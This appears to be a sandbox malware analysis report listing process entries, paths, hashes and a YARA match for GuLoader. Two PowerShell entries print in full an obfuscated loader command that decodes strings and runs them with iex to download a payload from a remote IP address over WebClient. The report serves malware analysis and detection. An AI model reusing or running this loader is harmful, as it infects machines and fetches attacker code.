                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:11:35:11
                                    Start date:15/04/2025
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Thickskulled='func';Get-History;$Thickskulled+='t';Get-History;$Thickskulled+='i';$Hyldebusk=Get-History;$Thickskulled+='on:';(ni -p $Thickskulled -n Centralkomites -value { param($Toenderne);$Udlaansafdelingerne=5;do {$Hypersonically78+=$Toenderne[$Udlaansafdelingerne];$Udlaansafdelingerne+=6} until(!$Toenderne[$Udlaansafdelingerne])$Hypersonically78});ConvertTo-Html;(ni -p $Thickskulled -n Desiodothyroxine3 -value {param($Yodhs);.($Likrer) ($Yodhs)});ConvertTo-Html;$Protozoal=Centralkomites 'UdhunNAandseH lvfTKnowi.Sygehw';$Protozoal+=Centralkomites 'Tra.pe Ng eBGee.scStannl espIWeekeESkrumNOve,ft';$Affaldsbehandlingssystem=Centralkomites 'StensM SuitoTapwozPlatfividerlRooinl kogla Galm/';$Humps=Centralkomites 'Unt,rT b ralShowes ksko1I ter2';$Personnummers='Natur[ Mor.NPaa eEMondoTEll c.AudiosSuperEDirkeRTilkmvKorreiAl efcPyramEBrrespApproOAssorIu visNWhi ktIntegm per aGrievn ddanAfortrGFremhEFren rSoutf]Hellb: Hove: ensesEngulER.novcS wdeU PostrAcadeIElytrTAvedrySoejlpPardyRCodeboBassiTDeteko Fermc Utm.Ou derl Un,e=Gener$UnencHUdkraU ponsmAbeskpCheaps';$Affaldsbehandlingssystem+=Centralkomites 'Re.ym5 Me e. Re a0Civil Basha(,idsnWFjorti umlinA prodKilesoM.gilwIllegsGonad ParaNFaculTR sle B try1 Tita0 Neut.Restr0Umora;Disv Wan lWStimuiHjertnUnte 6Medbo4Mudst;Udsty Keciax bill6 ava4wicki;Lagri hawmrHunchvCbest:ifrer1ingse3Nasio4S,ema.udla 0Tabli)unalc RevolGFaaf eEquipcQuin,kSphaeo Gru / Cram2 Husa0 U.ya1 Week0T old0Herm.1Blast0Milli1Therm FortjFDuffaiLbeilrEberteHarmlf,sychoTrigoxchemo/Bihen1Ba.al3Fo pa4binar. etst0';$Transculturation=Centralkomites 'Skinnu SkilSUningeFo.terLavem-c eatATrochG nrulE EkstnUdartT';$Briggsk116=Centralkomites ' DischSaigat L.tttBundfpAnhe :Absfa/ Flaa/Dr ve6Sconc8 Eva..k bel1 arss6No pa8Marab.Raa e2P,ove2Musee3 Skam.Adiap1 Gyno0Dv gb8U rep/ ShelJUdlovDL the/CobalGJ ngaoDrewrsStealsVe.daiRibonpKorpseProgrrBobecsHansa.Reopetam ryoWeakmc';$Aftgtsydelser=Centralkomites ' pist>';$Likrer=Centralkomites 'RykkeiIsthmEPermix';$Hyposynergia='Sprngningsekspertens';$Konsigneres='\Discoach.Imm';Desiodothyroxine3 (Centralkomites '.loms$ UpsogHimmeL GushOVand,bLabioABriseLReinf: Ove A Buskf.orgeg SeldIS,rivVAcr tEDoodaLGyp ySRu,ddEEu,ognInsorS Penu=Endoc$Spen,EPol tN BlomVScumm: BordA .bysPQuinapAfskrdBlamia InfiTLitmua Brod+Donat$PrintKDu.niofr naNFishlsBegorIUm.rsgPicklnAsthoeTagdkrHjspneTube S');Desiodothyroxine3 (Centralkomites 'tho k$ AdstGSemiblB,folODactyBFassaAK risLudlgg:Unen pF gler ialti ttacsP nnikridicrExcitIJejunGFastlEbr gnNSymbre ars=Metap$ V lsbIllu,RAt mdIConfegBekengrepresLukrek Sd,k1Jydep1Balne6kryst. Fop SPigwaPWilcoL Ch liGtesktPriso(Ligh.$UknneAPolelfAfbetTMeropGMe.ogtConvesStamky cornDBrushe SerilPunktSDappeEAfgnarCockn)');Desiodothyroxine3 (Centralkomites $Personnummers);$Briggsk116=$Priskrigene[0];$Skaberkrfters=(Centralkomites 'Nimme$.tandGBou.hlErob,oTasseb ExcrAdigtelAssy.:Cre cA rideQ .vlsuVindaa SkribGe.neERadiolVerdel ScalE Brio=Cityin BrugeKabelwCross- SeicOResulbMa lejDatatE Me.nCSugetTGol c So iSefforycanzoSTeleftVild,ET.erimSe,nd. Ynde$ TevaPRe.chRTe neoR vieTSmaasOL ndsZpusilo He,tahovedl');Desiodothyroxine3 ($Skaberkrfters);Desiodothyroxine3 (Centralkomites 'pho o$Dy buAEssigqbes uuBl,kdaC.anub LicieLivrelDyrtilL vtseDukse. rebHSlagte miniaPreandGedebeHeterrCar.osCinch[extor$PyramT aserrCol paEth rnQua rs Te tcOplivu,aklilSpurgtCountuCzekor roubaSaltgtSt,ininytteogaasenFors ]Barsl=Under$TetraA Snowf PangfSavinaRekhtl P.ocdMixils RectbRoyaleWanglhRounda Dek nFa,ord esilForesis esvnNoresgopmaasBenedsGangeyRek nsEns,etMoniteEchoem');$Phraseology=Centralkomites 'Respi$tagasAEpignqGrantu hicaDiasybMastaeSkyd lSoffilBrotheHvlve.UnderDfam.lo trbswSkrivnAth elUdbryo MaldaSu frd CokeFDriftiHl.nilSkalkeBrnep(In.fr$HotmeBTrernrLieutiCobirg Ac rgPl nksFeltrkZohar1 Skum1Overh6Crota,Jo,le$ExpiaM Ta aiVidernSoci iAntipmJambia Doc lRaadll.aramn C,esnG deseFormad Thete Spin)';$Minimallnnede=$Afgivelsens;Desiodothyroxine3 (Centralkomites ' Ages$Anm lgVelfoLGemmeoTe plB guicABlok,lBor,v:SintrMBetonAOldkirblimbX TrirI BallsSopraMHedonEDesse= ormb(Bloodt ves EPresuSMotivtBlodu-CountpPlaneaUndiftNummeH and Quadr$TriniMskostiA.ksiNSwimmi Hi hm LandAL.medLsiltelSpaninIhje nOpve EtaellD Pte eSkra,)');while (!$Marxisme) {Desiodothyroxine3 (Centralkomites 'Celsi$JealogGallulDebatobrutabP eacaMhedel prng:autooBS indaEl,keaOstradC,mpal D phnD awag Fetid AceteUn.ep=Friha$Sto dvAmonheamp.ir SlogmKbenhoDerieu unbulLaboru') ;Desiodothyroxine3 $Phraseology;Desiodothyroxine3 (Centralkomites ' Unnu[S utsT inimhGardnrBlafreAfhngaReoccdSh ndI enernAntifgPugna.EkstrT phobHStokkrTaktre AarsA ,kovdKbsst]Fyrin:umrke: S gts SchiLskrupetr stEAntaiPVe.st(drmme4Slikk0 Ca o0Desir0Sho.t)');Desiodothyroxine3 (Centralkomites 'Crani$For.nG A luLFrugtOUnwarbhusasa oextlKredi:Peri MBilliaTorperspookXAimfuiesrogs undemhalsbe Hype= nsva( Barnt LokaeBermts,emogTca so-FljalP TallASi naTUn,ochPelsd Acan $MatchmAadseiBegonNKultuiSimazMRevi aAutodLBevisLHanden BajonSpumaER forDCavumeBygni)') ;Desiodothyroxine3 (Centralkomites ' Tran$InterGmaniolDrankO,cquibpaillaFerroLCadav:Str,gGM ltiECosmonMesacScourbt StriA RockN BrylD Korts Rkenl VirtSUnde,= S,ld$animagwel mL P,raOFarfubUnde.AovercLmusef:UnimpDUdgifoSeksatslattTHemihe DeltDThomanEft,reSmygeSsuttes ,ide+udmaa+ Blin%Paavi$ orrepStnkeRCigariBi dsS yngek Ni,hr Hi ticorrog,ychnE UndenUntrue F.em.ToppuCBedtiOMaskiUElvchnGl.rit') ;$Briggsk116=$Priskrigene[$Genstandsls]}$Pitarah=399137;$akademikerarbejdslshed=32580;Desiodothyroxine3 (Centralkomites 'Vizie$UdkasGBoulel Fr,mO LienbStagga NugaLLev,l:L mnepGulliopo rleAns,it Ge nHtor eo scheo,agcedPlatt Slowb= Dang IndlgG TilfEMaanatCou t-Plkkec VsenoAntitnPacifTBams edoumaNGavagT Flan Berig$MilamM OverI BrunNLitteIFrostmTyperA CirkLAvisllPalaeNGradiN fkrie J niD Py ie');Desiodothyroxine3 (Centralkomites 'Hinge$kongrgFolkelKlaskoSy.pobNe riaErhvel Flor: FjerS BronuS kenm TrivpNrin eDiebag My enSk ls Fre = Te.s Tri a[FlyrpSFdselyHomocs protAuktieMeditmKogej.PraktCPrvetoudtrrnde,erv MatreEksamr Ter.tYnded]Nonco: Ic n: I,ddFMildhrFast,oPy.temBe alBVagtma Rimls uedaeOdac.6Mista4EffekSPerirtStjerr BirtiAftalnCondeg Shee(Boner$ MycoPGajauo hetreCo artSpindhGammoo B auoDiarcdEjerl)');Desiodothyroxine3 (Centralkomites 'Kmpem$D.mongNeotel MimiOspegeb GeneAfl vel germ:Prel.OVocabVSyna eNonmuR Ze gNMalagEUnornrVa asvPreinoFje,duSpontSSabelLAlec YAnten Exist=Enh d assa[Aads,sSommeY OnomS O.skT CalceRdmesMAnbef. Log,TSu trePerscXRgsk.T fsen.GrnsiE TrasnG ndaCUnmovoVam edDundeIUndf NIceboG.illi] emop:Intel:bomseaSalsus Misac DalaIGobanIRarif.Udr nGIl faEFr ertMercisI.hthtKrediRUdsvviCabalN NdsaGUdskr(Tri o$krimisKrediu ArviMRembopL ctoEmethogElaboNTeam )');Desiodothyroxine3 (Centralkomites 'Skriv$InfangTon.vlClinoo A.pebGpdhoa SaltLBrevd:MyosctbeforJfairfsVan dtA.tieaMinerT GelliIbsenv ImpoEUndirrLusatnGir sEDr,susBeari=Hensi$EnchaoGuldmVSpu.vELyngsR U moNBasebeBesvarAnarkvHegelO BranUKamm,sAspirl PresYSouch.StemmS Tra uOmforbSkovlSforlitBa rdrCin.aIUnpatn Neongstjer( Tran$,hlorPkvgp,iUlydiTHobeda CaddR,paidALawk H Pro , Tibe$ferl aStempKNeutrADis rd IberEKonflmPseudiSweatk ProgEUkraiRPagura SpydRRelisbvildtenonphJDemisd Din SOleagLBe,okSMant,hMegamE aresd ntre)');Desiodothyroxine3 $Tjstativernes;"
                                    Imagebase:0x7ff7016f0000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:11:35:11
                                    Start date:15/04/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff62fc20000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:8
                                    Start time:11:35:19
                                    Start date:15/04/2025
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Thickskulled='func';Get-History;$Thickskulled+='t';Get-History;$Thickskulled+='i';$Hyldebusk=Get-History;$Thickskulled+='on:';(ni -p $Thickskulled -n Centralkomites -value { param($Toenderne);$Udlaansafdelingerne=5;do {$Hypersonically78+=$Toenderne[$Udlaansafdelingerne];$Udlaansafdelingerne+=6} until(!$Toenderne[$Udlaansafdelingerne])$Hypersonically78});ConvertTo-Html;(ni -p $Thickskulled -n Desiodothyroxine3 -value {param($Yodhs);.($Likrer) ($Yodhs)});ConvertTo-Html;$Protozoal=Centralkomites 'UdhunNAandseH lvfTKnowi.Sygehw';$Protozoal+=Centralkomites 'Tra.pe Ng eBGee.scStannl espIWeekeESkrumNOve,ft';$Affaldsbehandlingssystem=Centralkomites 'StensM SuitoTapwozPlatfividerlRooinl kogla Galm/';$Humps=Centralkomites 'Unt,rT b ralShowes ksko1I ter2';$Personnummers='Natur[ Mor.NPaa eEMondoTEll c.AudiosSuperEDirkeRTilkmvKorreiAl efcPyramEBrrespApproOAssorIu visNWhi ktIntegm per aGrievn ddanAfortrGFremhEFren rSoutf]Hellb: Hove: ensesEngulER.novcS wdeU PostrAcadeIElytrTAvedrySoejlpPardyRCodeboBassiTDeteko Fermc Utm.Ou derl Un,e=Gener$UnencHUdkraU ponsmAbeskpCheaps';$Affaldsbehandlingssystem+=Centralkomites 'Re.ym5 Me e. Re a0Civil Basha(,idsnWFjorti umlinA prodKilesoM.gilwIllegsGonad ParaNFaculTR sle B try1 Tita0 Neut.Restr0Umora;Disv Wan lWStimuiHjertnUnte 6Medbo4Mudst;Udsty Keciax bill6 ava4wicki;Lagri hawmrHunchvCbest:ifrer1ingse3Nasio4S,ema.udla 0Tabli)unalc RevolGFaaf eEquipcQuin,kSphaeo Gru / Cram2 Husa0 U.ya1 Week0T old0Herm.1Blast0Milli1Therm FortjFDuffaiLbeilrEberteHarmlf,sychoTrigoxchemo/Bihen1Ba.al3Fo pa4binar. etst0';$Transculturation=Centralkomites 'Skinnu SkilSUningeFo.terLavem-c eatATrochG nrulE EkstnUdartT';$Briggsk116=Centralkomites ' DischSaigat L.tttBundfpAnhe :Absfa/ Flaa/Dr ve6Sconc8 Eva..k bel1 arss6No pa8Marab.Raa e2P,ove2Musee3 Skam.Adiap1 Gyno0Dv gb8U rep/ ShelJUdlovDL the/CobalGJ ngaoDrewrsStealsVe.daiRibonpKorpseProgrrBobecsHansa.Reopetam ryoWeakmc';$Aftgtsydelser=Centralkomites ' pist>';$Likrer=Centralkomites 'RykkeiIsthmEPermix';$Hyposynergia='Sprngningsekspertens';$Konsigneres='\Discoach.Imm';Desiodothyroxine3 (Centralkomites '.loms$ UpsogHimmeL GushOVand,bLabioABriseLReinf: Ove A Buskf.orgeg SeldIS,rivVAcr tEDoodaLGyp ySRu,ddEEu,ognInsorS Penu=Endoc$Spen,EPol tN BlomVScumm: BordA .bysPQuinapAfskrdBlamia InfiTLitmua Brod+Donat$PrintKDu.niofr naNFishlsBegorIUm.rsgPicklnAsthoeTagdkrHjspneTube S');Desiodothyroxine3 (Centralkomites 'tho k$ AdstGSemiblB,folODactyBFassaAK risLudlgg:Unen pF gler ialti ttacsP nnikridicrExcitIJejunGFastlEbr gnNSymbre ars=Metap$ V lsbIllu,RAt mdIConfegBekengrepresLukrek Sd,k1Jydep1Balne6kryst. Fop SPigwaPWilcoL Ch liGtesktPriso(Ligh.$UknneAPolelfAfbetTMeropGMe.ogtConvesStamky cornDBrushe SerilPunktSDappeEAfgnarCockn)');Desiodothyroxine3 (Centralkomites $Personnummers);$Briggsk116=$Priskrigene[0];$Skaberkrfters=(Centralkomites 'Nimme$.tandGBou.hlErob,oTasseb ExcrAdigtelAssy.:Cre cA rideQ .vlsuVindaa SkribGe.neERadiolVerdel ScalE Brio=Cityin BrugeKabelwCross- SeicOResulbMa lejDatatE Me.nCSugetTGol c So iSefforycanzoSTeleftVild,ET.erimSe,nd. Ynde$ TevaPRe.chRTe neoR vieTSmaasOL ndsZpusilo He,tahovedl');Desiodothyroxine3 ($Skaberkrfters);Desiodothyroxine3 (Centralkomites 'pho o$Dy buAEssigqbes uuBl,kdaC.anub LicieLivrelDyrtilL vtseDukse. rebHSlagte miniaPreandGedebeHeterrCar.osCinch[extor$PyramT aserrCol paEth rnQua rs Te tcOplivu,aklilSpurgtCountuCzekor roubaSaltgtSt,ininytteogaasenFors ]Barsl=Under$TetraA Snowf PangfSavinaRekhtl P.ocdMixils RectbRoyaleWanglhRounda Dek nFa,ord esilForesis esvnNoresgopmaasBenedsGangeyRek nsEns,etMoniteEchoem');$Phraseology=Centralkomites 'Respi$tagasAEpignqGrantu hicaDiasybMastaeSkyd lSoffilBrotheHvlve.UnderDfam.lo trbswSkrivnAth elUdbryo MaldaSu frd CokeFDriftiHl.nilSkalkeBrnep(In.fr$HotmeBTrernrLieutiCobirg Ac rgPl nksFeltrkZohar1 Skum1Overh6Crota,Jo,le$ExpiaM Ta aiVidernSoci iAntipmJambia Doc lRaadll.aramn C,esnG deseFormad Thete Spin)';$Minimallnnede=$Afgivelsens;Desiodothyroxine3 (Centralkomites ' Ages$Anm lgVelfoLGemmeoTe plB guicABlok,lBor,v:SintrMBetonAOldkirblimbX TrirI BallsSopraMHedonEDesse= ormb(Bloodt ves EPresuSMotivtBlodu-CountpPlaneaUndiftNummeH and Quadr$TriniMskostiA.ksiNSwimmi Hi hm LandAL.medLsiltelSpaninIhje nOpve EtaellD Pte eSkra,)');while (!$Marxisme) {Desiodothyroxine3 (Centralkomites 'Celsi$JealogGallulDebatobrutabP eacaMhedel prng:autooBS indaEl,keaOstradC,mpal D phnD awag Fetid AceteUn.ep=Friha$Sto dvAmonheamp.ir SlogmKbenhoDerieu unbulLaboru') ;Desiodothyroxine3 $Phraseology;Desiodothyroxine3 (Centralkomites ' Unnu[S utsT inimhGardnrBlafreAfhngaReoccdSh ndI enernAntifgPugna.EkstrT phobHStokkrTaktre AarsA ,kovdKbsst]Fyrin:umrke: S gts SchiLskrupetr stEAntaiPVe.st(drmme4Slikk0 Ca o0Desir0Sho.t)');Desiodothyroxine3 (Centralkomites 'Crani$For.nG A luLFrugtOUnwarbhusasa oextlKredi:Peri MBilliaTorperspookXAimfuiesrogs undemhalsbe Hype= nsva( Barnt LokaeBermts,emogTca so-FljalP TallASi naTUn,ochPelsd Acan $MatchmAadseiBegonNKultuiSimazMRevi aAutodLBevisLHanden BajonSpumaER forDCavumeBygni)') ;Desiodothyroxine3 (Centralkomites ' Tran$InterGmaniolDrankO,cquibpaillaFerroLCadav:Str,gGM ltiECosmonMesacScourbt StriA RockN BrylD Korts Rkenl VirtSUnde,= S,ld$animagwel mL P,raOFarfubUnde.AovercLmusef:UnimpDUdgifoSeksatslattTHemihe DeltDThomanEft,reSmygeSsuttes ,ide+udmaa+ Blin%Paavi$ orrepStnkeRCigariBi dsS yngek Ni,hr Hi ticorrog,ychnE UndenUntrue F.em.ToppuCBedtiOMaskiUElvchnGl.rit') ;$Briggsk116=$Priskrigene[$Genstandsls]}$Pitarah=399137;$akademikerarbejdslshed=32580;Desiodothyroxine3 (Centralkomites 'Vizie$UdkasGBoulel Fr,mO LienbStagga NugaLLev,l:L mnepGulliopo rleAns,it Ge nHtor eo scheo,agcedPlatt Slowb= Dang IndlgG TilfEMaanatCou t-Plkkec VsenoAntitnPacifTBams edoumaNGavagT Flan Berig$MilamM OverI BrunNLitteIFrostmTyperA CirkLAvisllPalaeNGradiN fkrie J niD Py ie');Desiodothyroxine3 (Centralkomites 'Hinge$kongrgFolkelKlaskoSy.pobNe riaErhvel Flor: FjerS BronuS kenm TrivpNrin eDiebag My enSk ls Fre = Te.s Tri a[FlyrpSFdselyHomocs protAuktieMeditmKogej.PraktCPrvetoudtrrnde,erv MatreEksamr Ter.tYnded]Nonco: Ic n: I,ddFMildhrFast,oPy.temBe alBVagtma Rimls uedaeOdac.6Mista4EffekSPerirtStjerr BirtiAftalnCondeg Shee(Boner$ MycoPGajauo hetreCo artSpindhGammoo B auoDiarcdEjerl)');Desiodothyroxine3 (Centralkomites 'Kmpem$D.mongNeotel MimiOspegeb GeneAfl vel germ:Prel.OVocabVSyna eNonmuR Ze gNMalagEUnornrVa asvPreinoFje,duSpontSSabelLAlec YAnten Exist=Enh d assa[Aads,sSommeY OnomS O.skT CalceRdmesMAnbef. Log,TSu trePerscXRgsk.T fsen.GrnsiE TrasnG ndaCUnmovoVam edDundeIUndf NIceboG.illi] emop:Intel:bomseaSalsus Misac DalaIGobanIRarif.Udr nGIl faEFr ertMercisI.hthtKrediRUdsvviCabalN NdsaGUdskr(Tri o$krimisKrediu ArviMRembopL ctoEmethogElaboNTeam )');Desiodothyroxine3 (Centralkomites 'Skriv$InfangTon.vlClinoo A.pebGpdhoa SaltLBrevd:MyosctbeforJfairfsVan dtA.tieaMinerT GelliIbsenv ImpoEUndirrLusatnGir sEDr,susBeari=Hensi$EnchaoGuldmVSpu.vELyngsR U moNBasebeBesvarAnarkvHegelO BranUKamm,sAspirl PresYSouch.StemmS Tra uOmforbSkovlSforlitBa rdrCin.aIUnpatn Neongstjer( Tran$,hlorPkvgp,iUlydiTHobeda CaddR,paidALawk H Pro , Tibe$ferl aStempKNeutrADis rd IberEKonflmPseudiSweatk ProgEUkraiRPagura SpydRRelisbvildtenonphJDemisd Din SOleagLBe,okSMant,hMegamE aresd ntre)');Desiodothyroxine3 $Tjstativernes;"
                                    Imagebase:0xbe0000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.2573407527.0000000009DB6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:9
                                    Start time:11:35:19
                                    Start date:15/04/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff62fc20000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Disassembly

                                    No disassembly